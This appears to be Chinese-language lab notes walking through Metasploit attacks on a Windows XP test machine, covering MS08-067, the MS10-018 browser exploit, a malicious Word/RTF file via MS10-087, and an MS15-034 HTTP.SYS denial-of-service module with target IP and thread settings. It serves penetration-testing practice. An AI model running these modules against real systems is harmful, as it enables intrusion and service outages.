💟网络服务器攻击渗透(MS08-067)
首先search ms08-067漏洞然后info查看
浏览器攻击渗透(MS10-018)
show options查看配置
我们让目标机访问下这个url,这时msfconsole中就出现了successfuully,我们按回车(这里我尝试了好久,每次靶机访问IE就跳出OD来,最后把靶机里面的OD删掉就好了)。
sessions -i 1进入会话
应用软件格式渗透,利用word去渗透(MS10-087)
用到的靶机为:WinXPenSP3。
打开msfconsole
搜索下ms10-018的路径:search ms10-087。
使用这个模块:
Use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof
执行show options配置环境
我们把文件名改成ceshi。我们设置现在让他弹出一个计算器:set CMD calc.exe。
显示隐藏文件找到生成文件
找到后利用刚刚ms10-018上传运行
CVE-2015-1635-HTTP.SYS远程执行代码漏洞(ms15-034):
(1)利用ms15-034漏洞读取服务器内存数据
(2)利用ms15-034漏洞进行ddos攻击
use auxiliary/dos/http/ms15_034_ulonglongadd //打开这个漏洞模块
set
rhosts 192.168.80.130//配置目标IP
set
threads 10//配置10个线程
run//运行